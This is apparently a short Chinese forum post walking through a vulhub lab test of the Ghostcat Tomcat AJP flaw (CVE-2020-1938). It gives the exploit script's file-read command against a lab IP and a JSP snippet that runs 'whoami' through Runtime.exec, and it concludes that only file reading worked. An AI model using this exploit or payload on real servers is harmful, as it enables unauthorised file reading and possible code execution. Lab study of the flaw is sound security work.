幽灵猫 CVE-2020-1938 实验
首先搭建好vulhub靶场进入 /vulhub-master/tomcat/CVE-2020-1938
执行命令:
sudo docker-compose up -d
再执行命令 查看运行的容器
sudo docker ps
下载幽灵猫利用程序:
链接:https://pan.baidu.com/s/16_QLyemn6lQSt_yhRnOOLg?pwd=iylb
提取码:iylb
进入程序执行命令:
python2 ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.100.10 -p 8009 -f /WEB-INF/web.xml
手动进入靶机里
创建文件2.txt,代码如下
<%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%>
这个whoami并没有执行,说明这个漏洞只能读取文件,并不能文件包含。
页:
[1]